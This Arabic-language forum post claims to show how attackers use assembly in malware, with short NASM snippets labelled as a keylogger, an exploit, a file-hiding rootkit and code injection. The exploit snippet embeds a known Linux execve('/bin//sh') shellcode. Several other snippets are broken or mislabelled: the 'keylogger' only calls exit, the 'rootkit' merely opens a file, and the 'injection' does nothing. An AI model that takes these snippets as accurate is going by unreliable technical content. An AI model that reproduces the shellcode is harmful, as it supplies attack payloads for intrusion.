- بواسطة x32x01 ||
لغة الاسمبلي بتدي للمبرمجين وصول مباشر لمكونات الهاردوير والنظام، وده بيخليها أداة قوية للهكرز. استخدام الاسمبلي في البرمجة بيتيح التحكم الكامل في المعالج والذاكرة وده ممكن يستغل بعدة طرق. هنستعرض شوية أمثلة على ازاي الهكرز ممكن يستخدموا لغة الاسمبلي في البرمجيات الخبيثة.
أمثلة على استخدام لغة الاسمبلي في البرمجيات الخبيثة
أمثلة على استخدام لغة الاسمبلي في البرمجيات الخبيثة
1. كتابة برمجيات التجسس (Keyloggers):
الهكرز ممكن يكتبوا برمجيات تتجسس على ضغطات المفاتيح باستخدام لغة الاسمبلي. ده مثال بسيط لكود بيعمل كده:
Code:
section .data
buffer db 256 dup(0)
section .bss
section .text
global _start
_start:
; مراقبة ضغطات المفاتيح
call get_key
jmp _start
get_key:
; استدعاء النظام للحصول على حالة المفاتيح
mov eax, 1
int 0x80
ret
2. استغلال الثغرات (Exploits):
الهكرز ممكن يستخدموا لغة الاسمبلي لاستغلال ثغرات في البرامج أو أنظمة التشغيل. مثلًا، ممكن يكتبوا كود بيستغل ثغرة في إدارة الذاكرة عشان ينفذ كود ضار:
Code:
section .data
shellcode db 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0x99, 0xb0, 0x0b, 0xcd, 0x80
section .text
global _start
_start:
jmp shellcode
3. إخفاء البرمجيات الخبيثة (Rootkits):
الهكرز ممكن يستخدموا لغة الاسمبلي لكتابة برمجيات بتخفي وجود البرمجيات الخبيثة عن أنظمة الكشف والحماية. ده مثال بسيط على كود بيستخدم دوال النظام لإخفاء ملف:
Code:
section .data
filename db 'malware.exe', 0
section .text
global _start
_start:
; استدعاء النظام لإخفاء الملف
mov eax, 5
mov ebx, filename
mov ecx, 0
int 0x80
; إنهاء البرنامج
mov eax, 1
xor ebx, ebx
int 0x80
4. حقن الكود (Code Injection):
الهكرز ممكن يستخدموا لغة الاسمبلي لحقن كود ضار في برامج أخرى، واستغلالها لتنفيذ عمليات غير شرعية. مثال على كود بيحقن كود في برنامج آخر:
Code:
section .data
target_pid dd 1234
shellcode db 0x90, 0x90, 0x90, 0x90 ; كود بسيط كتجربة
section .text
global _start
_start:
; حقن الكود في عملية الهدف
mov eax, target_pid
mov ebx, shellcode
int 0x80
; إنهاء البرنامج
mov eax, 1
xor ebx, ebx
int 0x80